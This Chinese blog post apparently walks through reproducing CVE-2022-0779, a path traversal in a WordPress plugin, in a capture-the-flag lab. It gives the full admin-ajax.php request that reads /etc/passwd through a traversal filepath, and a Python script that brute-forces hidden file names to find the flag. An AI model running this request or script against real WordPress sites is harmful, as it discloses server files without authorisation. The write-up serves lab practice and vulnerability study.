当前位置: 首页 > news >正文

CVE-2022-0779

news 2026/5/31 13:07:35

CVE-2022-0779复现
image
使用网上的资料查看/wp-admin/admin-ajax.php这个网页,使用bp抓包,修改为POST方法,输入field_name=test&filepath=/../../../../../../../../etc/passwd&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=a889600f9e&is_ajax=true
其中的pf_nonce在源码里面
image
bp发包
image
返回值中如果有"umRemoveFile"就说明该文件存在
根据题目提示访问1.txt文件
image
里面说明了flag在哪个文件里面
写一个代码随机生成字符串,在测试它是否存在,最后获得flag存在的文件

点击查看代码 
import requestsdef getInfo(file):headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8","Accept": "*/*",}url = "https://eci-2ze4bj42p1b9qgqs96v7.cloudeci1.ichunqiu.com:80/wp-admin/admin-ajax.php"data = {'field_name': 'test','filepath': '/../../../../../../../../flagfile/' + file,'field_id': 'um_field_4','form_key': 'Upload','action': 'um_show_uploaded_file','pf_nonce': 'a889600f9e','is_ajax': True,'field_name': 'test',}r = requests.post(url, headers=headers, data=data)if "umRemoveFile" in r.text:return Trueelse:return Falseif __name__ == '__main__':key = '1234567890abcdefghijklmnopqrstuvwxyz'for i in range(0, 10):for w in key:file = str(i) + str(w)if getInfo(file):print(w, end="")break
运行代码获得文件名

image

输入文件名获得flag
image

http://www.rkmt.cn/news/132079.html

相关文章:

  • DaemonSet service ingress的 - 教程
  • 用 .NET MAUI 10 + VS Copilot 从 0 开发一个签到 App(一)
  • 人工智能AGI
  • 一文读懂大模型微调:从全参数到LoRA,打造你的专属AI专家
  • 为什么食管癌发现都是晚期--转自杭州日报
  • 2026行业展望——大模型,非常详细收藏这一篇就够了
  • 企业级知识库架构图解:从“玩具“到“工具“的蜕变之路,解决大模型上下文坍塌问题
  • 基于YOLOv10的花生种子霉变检测系统(YOLOv10深度学习+YOLO数据集+UI界面+Python项目+模型)
  • 用FastAPI构建爬虫接口服务:让爬虫变成可调用的API - 详解
  • 今天教大家免费使用先进的AI大模型,非常详细收藏这一篇就够了
  • 好写作AI:当免费的GPT都能写论文,你为什么还需要专业工具?
  • 好写作AI:当所有AI写作工具都长一样,你的选择困难症犯了吗?
  • 投稿?别怕!宏智树AI的期刊“外挂”功能,给学术新手的进阶指南
  • 【BuildFlow 筑流】unitrix_macros库 Cargo.toml 配置详解及依赖库用法
  • 一张蓝图胜过一万行填鸭:为何顶尖AI把开题报告“活”成了你的开题战略家?
  • python:报错:ModuleNotFoundError: No module named langchain_community
  • “你用的那个AI,到底把你坑了还是救了?”——解锁宏智树论文的协作新范式
  • 系统文件gdi32.dll缺失或损坏 免费下载修复方法
  • 拒绝品牌碰瓷!如何通过影刀RPA为品牌IP搭建一套高效的“内容合规治理”工作流?
  • fontext.dll文件缺失或损坏问题 下载修复方法
  • 国际清爽版,比国内版好用太多了!
  • 三折叠手机有什么使用场景和优势?三星Galaxy Z TriFold的全能进化
  • 控件的Invoke 方法、BeginInvoke 方法、InvokeAsync 方法
  • Windows系统文件fwbase.dll丢失损坏问题 下载修复
  • 研究生必备8款AI写论文神器:5分钟生成25000字问卷类论文,自动生成高信度数据
  • 我发现工业时序预测不准 后来才知道用WaveNet替代LSTM捕捉长期依赖
  • 《开发者出海必看:如何优雅地搞定海外服务支付?(保姆级干货)》
  • 为 AI 智能体打造高效的上下文工程 -- Anthropic
  • 全球股市估值与太空采矿技术的经济可行性
  • 实用指南:百度天气:空气质量WebGIS可视化的创新实践 —— 以湖南省为例